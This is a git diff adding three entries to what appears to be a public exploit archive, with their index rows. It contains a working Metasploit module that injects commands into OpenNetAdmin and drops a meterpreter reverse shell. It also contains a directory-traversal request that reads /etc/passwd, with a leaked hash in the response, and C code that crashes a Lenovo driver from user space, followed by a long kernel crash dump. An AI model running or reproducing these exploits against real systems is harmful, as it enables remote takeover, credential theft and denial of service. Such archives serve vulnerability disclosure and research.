diff --git a/exploits/php/webapps/47772.rb b/exploits/php/webapps/47772.rb new file mode 100755 index 000000000..a32129343 --- /dev/null +++ b/exploits/php/webapps/47772.rb @@ -0,0 +1,104 @@ +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + def initialize(info = {}) + super(update_info(info, + 'Name' => 'OpenNetAdmin Ping Command Injection', + 'Description' => %q{ + This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1. + }, + 'Author' => + [ + 'mattpascoe', # Vulnerability discovery + 'Onur ER ' # Metasploit module + ], + 'References' => + [ + ['EDB', '47691'] + ], + 'DisclosureDate' => '2019-11-19', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Privileged' => false, + 'Targets' => + [ + ['Automatic Target', {}] + ], + 'DefaultOptions' => + { + 'RPORT' => 80, + 'payload' => 'linux/x86/meterpreter/reverse_tcp' + }, + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('VHOST', [false, 'HTTP server virtual host']), + OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php']) + ] + ) + end + + def check + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => false, + 'vars_post' => { + 'xajax' => 'window_open', + 'xajaxargs[]' => 'app_about' + } + }) + + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + unless res.body =~ /OpenNetAdmin/i + return CheckCode::Safe + end + + opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first + version = Gem::Version.new('opennetadmin_version') + + if version + vprint_status "OpenNetAdmin version #{version}" + end + + if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1') + return CheckCode::Appears + end + + CheckCode::Detected + end + + def exploit + print_status('Exploiting...') + execute_cmdstager(flavor: :printf) + end + + def filter_bad_chars(cmd) + cmd.gsub!(/chmod \+x/, 'chmod 777') + end + + def execute_command(cmd, opts = {}) + post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping" + + begin + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => false, + 'data' => post_data + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47773.txt b/exploits/php/webapps/47773.txt new file mode 100644 index 000000000..742fb93d7 --- /dev/null +++ b/exploits/php/webapps/47773.txt @@ -0,0 +1,21 @@ +# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal +# Date: 2019-12-11 +# Author: Numan Türle +# Vendor Homepage: http://www.bullwark.net/ +# Version : Bullwark Momentum Series Web Server JAWS/1.0 +# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 + +POC +--------- + +GET /../../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: 12.0.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close + +Response +--------- + +root:ABgia2Z.lfFhA:0:0::/root:/bin/sh \ No newline at end of file diff --git a/exploits/windows/dos/47771.c b/exploits/windows/dos/47771.c new file mode 100644 index 000000000..bd8a55ca7 --- /dev/null +++ b/exploits/windows/dos/47771.c @@ -0,0 +1,435 @@ +# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC) +# Date: 2019-12-11 +# Exploit Author: Nassim Asrir +# CVE: CVE-2019-6192 +# Tested On: Windows 10(64bit) | ThinkPad T470p +# Vendor : https://www.lenovo.com/us/en/ +# Ref : https://support.lenovo.com/us/fr/solutions/len-29334 + +# Description +# A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver +# The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes +# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space. + +# Exploit + +#include +#include +#include + +int main(int argc, char **argv) +{ + HANDLE hDevice; + DWORD bret; + char szDevice[] = "\\\\.\\pmdrvs"; + + printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n"); + + printf("Opening handle to driver..\n"); + + if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) { + printf("Device %s succesfully opened!\n", szDevice); + printf("\tHandle: %p\n", hDevice); + } + else + { + printf("Error: Error opening device %s\n", szDevice); + } + + printf("\nPress any key to DoS.."); + _getch(); + + bret = 0; + + if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL)) + { + printf("DeviceIoControl Error - bytes returned %#x\n", bret); + } + + CloseHandle(hDevice); + return 0; +} + + +# RCA + +2: kd> !analyze -v +******************************************************************************* +* * +* Bugcheck Analysis * +* * +******************************************************************************* + +SYSTEM_SERVICE_EXCEPTION (3b) +An exception happened while executing a system service routine. +Arguments: +Arg1: 00000000c0000005, Exception code that caused the bugcheck +Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck +Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck +Arg4: 0000000000000000, zero. + +FAULTING_IP: +pmdrvs+109d +fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] + +CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50) +rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 +rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei pl zr na po nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246 +pmdrvs+0x109d: +fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? +Resetting default scope + +CPU_COUNT: 8 + +CPU_MHZ: af8 + +CPU_VENDOR: GenuineIntel + +CPU_FAMILY: 6 + +CPU_MODEL: 9e + +CPU_STEPPING: 9 + +CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init) + +BLACKBOXBSD: 1 (!blackboxbsd) + + +BLACKBOXPNP: 1 (!blackboxpnp) + + +CURRENT_IRQL: 0 + +ANALYSIS_SESSION_HOST: LAPTOP-SP + +ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485 + +ANALYSIS_VERSION: 10.0.17763.132 amd64fre + +LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d + +STACK_TEXT: +ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d +ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060 +ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59 +ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071 +ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc +ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56 +ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925 +00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844 + + +THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68 + +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb + +THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b + +FOLLOWUP_IP: +pmdrvs+109d +fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] + +FAULT_INSTR_CODE: 8941078b + +SYMBOL_STACK_INDEX: 0 + +FOLLOWUP_NAME: MachineOwner + +STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb + +BUGCHECK_STR: 2E8B5A19 + +EXCEPTION_CODE_STR: 2E8B5A19 + +EXCEPTION_STR: WRONG_SYMBOLS + +PROCESS_NAME: ntoskrnl.wrong.symbols.exe + +IMAGE_NAME: ntoskrnl.wrong.symbols.exe + +MODULE_NAME: nt_wrong_symbols + +SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000 + +BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 + +DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 + +PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS + +FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000 + +TARGET_TIME: 2019-09-30T19:27:36.000Z + +OSBUILD: 17763 + +OSSERVICEPACK: 0 + +SERVICEPACK_NUMBER: 0 + +OS_REVISION: 0 + +SUITE_MASK: 272 + +PRODUCT_TYPE: 1 + +OSPLATFORM_TYPE: x64 + +OSNAME: Windows 10 + +OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS + +OS_LOCALE: + +USER_LCID: 0 + +OSBUILD_TIMESTAMP: 1994-09-30 01:21:45 + +BUILDDATESTAMP_STR: 180914-1434 + +BUILDLAB_STR: rs5_release + +BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434 + +ANALYSIS_SESSION_ELAPSED_TIME: ae + +ANALYSIS_SOURCE: KM + +FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000 + +FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1} + +Followup: MachineOwner +--------- + +2: kd> u fffff804`28bf109d +pmdrvs+0x109d: +fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] +fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax +fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000) +fffff804`28bf10a8 85c0 test eax,eax +fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132) +fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h] +fffff804`28bf10b8 4885c9 test rcx,rcx +fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132) +2: kd> !for_each_frame .frame /r @$Frame +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx +00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx +rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 +rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 +r14=0000000000000000 r15=ffffc709dee8f408 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!KeBugCheckEx: +fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 +01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 +rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 +rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 +r14=0000000000000000 r15=ffffc709dee8f408 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!setjmpex+0x7f09: +fffff804`1f27a8e9 90 nop +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c +02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c +rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 +rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 +r14=0000000000000000 r15=ffffc709dee8f408 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!setjmpex+0x735c: +fffff804`1f279d3c b801000000 mov eax,1 +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f +03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f +rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 +rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 +r14=0000000000000000 r15=ffffc709dee8f408 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!_chkstk+0x41f: +fffff804`1f271b4f 0f1f00 nop dword ptr [rax] +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 +04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 +rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 +rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 +r14=0000000000000000 r15=ffffc709dee8f408 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!RtlUnwindEx+0x3440: +fffff804`1f1ca460 8bd0 mov edx,eax +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 +05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 +rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000 +rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40 +r14=ffffc709dee8f4b0 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!ExReleaseAutoExpandPushLockExclusive+0x264: +fffff804`1f0d7c24 84c0 test al,al +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 +06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 +rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 +rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!setjmpex+0x7fe2: +fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h] +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce +07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce +rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 +rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!setjmpex+0x42ce: +fffff804`1f276cae 440f20c0 mov rax,cr8 +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d +08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d +rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 +rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +pmdrvs+0x109d: +fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 +09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 +rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000 +rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +pmdrvs+0x5060: +fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a) +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 +0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 +rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 +rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!IofCallDriver+0x59: +fffff804`1f12dba9 4883c438 add rsp,38h +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 +0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 +rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 +rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!NtQueryInformationFile+0x1071: +fffff804`1f6abb11 448bf0 mov r14d,eax +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc +0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc +rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0 +rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!NtClose+0xffc: +fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663) +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 +0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 +rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 +rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!NtDeviceIoControlFile+0x56: +fffff804`1f64c356 4883c468 add rsp,68h +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 +0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 +rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 +rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!setjmpex+0x7925: +fffff804`1f27a305 0f1f00 nop dword ptr [rax] +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 +0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 +rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c +rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +00007fff`33aaf844 ?? ??? +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx + +# Mitigation + +Update to Lenovo Power Management driver version 1.67.17.48 or higher \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9ea8eaf0e..293b12fea 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6621,6 +6621,7 @@ id,file,description,date,author,type,platform,port 47767,exploits/windows/dos/47767.py,"Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (PoC)",2019-12-11,SajjadBnd,dos,windows, 47768,exploits/windows/dos/47768.txt,"AppXSvc 17763 - Arbitrary File Overwrite (DoS)",2019-12-11,"Gabor Seljan",dos,windows, 47769,exploits/windows/dos/47769.txt,"Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font",2019-12-11,"Google Security Research",dos,windows, +47771,exploits/windows/dos/47771.c,"Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)",2019-12-12,"Nassim Asrir",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -42080,3 +42081,5 @@ id,file,description,date,author,type,platform,port 47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware, 47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware, 47770,exploits/java/webapps/47770.txt,"Apache Olingo OData 4.0 - XML External Entity Injection",2019-12-11,"Compass Security",webapps,java, +47772,exploits/php/webapps/47772.rb,"OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)",2019-12-12,"Onur ER",webapps,php, +47773,exploits/php/webapps/47773.txt,"Bullwark Momentum Series JAWS 1.0 - Directory Traversal",2019-12-12,"numan türle",webapps,php,